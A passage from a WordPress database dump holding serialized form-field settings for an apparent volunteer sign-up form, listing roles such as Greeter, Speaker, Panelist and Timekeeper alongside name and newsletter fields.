dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:13:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:18:\"Attendee (support)\";s:5:\"value\";s:18:\"Attendee (support)\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Audio Visual Support\";s:5:\"value\";s:20:\"Audio Visual Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Clean Up Of Food After Event\";s:5:\"value\";s:28:\"Clean Up Of Food After Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Creative Arts Coordinator\";s:5:\"value\";s:25:\"Creative Arts Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Creative Artist\";s:5:\"value\";s:15:\"Creative Artist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:33:\"Food Services For After the Event\";s:5:\"value\";s:33:\"Food Services For After the Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Panelist\";s:5:\"value\";s:8:\"Panelist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Panel Moderator\";s:5:\"value\";s:15:\"Panel Moderator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Prelude Music Before Service\";s:5:\"value\";s:28:\"Prelude Music Before Service\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Speaker\";s:5:\"value\";s:7:\"Speaker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Timekeeper\";s:5:\"value\";s:10:\"Timekeeper\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8984,276,'container_class','','container_class',''),(8985,276,'manual_key','','manual_key',''),(8986,276,'custom_mask','','custom_mask',''),(8987,276,'custom_name_attribute','','custom_name_attribute',''),(8988,276,'personally_identifiable','','personally_identifiable',''),(8989,276,'value','','value',''),(8990,277,'editActive','','editActive',''),(8991,277,'field_label','Last Name','field_label','Last Name'),(8992,277,'field_key','lastname_323','field_key','lastname_323'),(8993,277,'default','','default',''),(8994,277,'container_class','','container_class',''),(8995,277,'custom_name_attribute','lname','custom_name_attribute','lname'),(8996,277,'personally_identifiable','1','personally_identifiable','1'),(7676,267,'key','listmultiselect_233','key','listmultiselect_233'),(7677,267,'container_class',' one-third first ','container_class',' one-third first '),(7678,267,'parent_id','24','parent_id','24'),(7679,268,'objectType','Field','objectType','Field'),(7680,268,'objectDomain','fields','objectDomain','fields'),(7681,268,'editActive','','editActive',''),(7682,268,'order','13','order','13'),(7683,268,'type','listmultiselect','type','listmultiselect'),(7684,268,'label','Email Newsletter Help','label','Email Newsletter Help'),(7685,268,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7686,268,'label_pos','above','label_pos','above'),(7687,268,'list_type','multi','list_type','multi'),(7688,268,'multi_size','2','multi_size','2'),(7689,268,'list_show_value','1','list_show_value','1'),(7690,268,'list','a:0:{}','list','a:0:{}'),(7691,268,'user_info_field_group','','user_info_field_group',''),(7692,268,'calc_auto_include','0','calc_auto_include','0'),(7693,268,'user_state','0','user_state','0'),(7694,268,'num_sort','0','num_sort','0'),(7695,268,'admin_label','','admin_label',''),(7696,268,'show_help','0','show_help','0'),(7697,268,'help_text','','help_text',''),(7698,268,'show_desc','0','show_desc','0'),(7699,268,'desc_pos','none','desc_pos','none'),(7700,268,'desc_text','','desc_text',''),(7701,268,'element_class','','element_class',''),(7702,268,'required','0','required','0'),(7703,268,'options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Gather Content\";s:5:\"value\";s:14:\"Gather Content\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"Write/Edit Articles\";s:5:\"value\";s:19:\"Write/Edit Articles\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 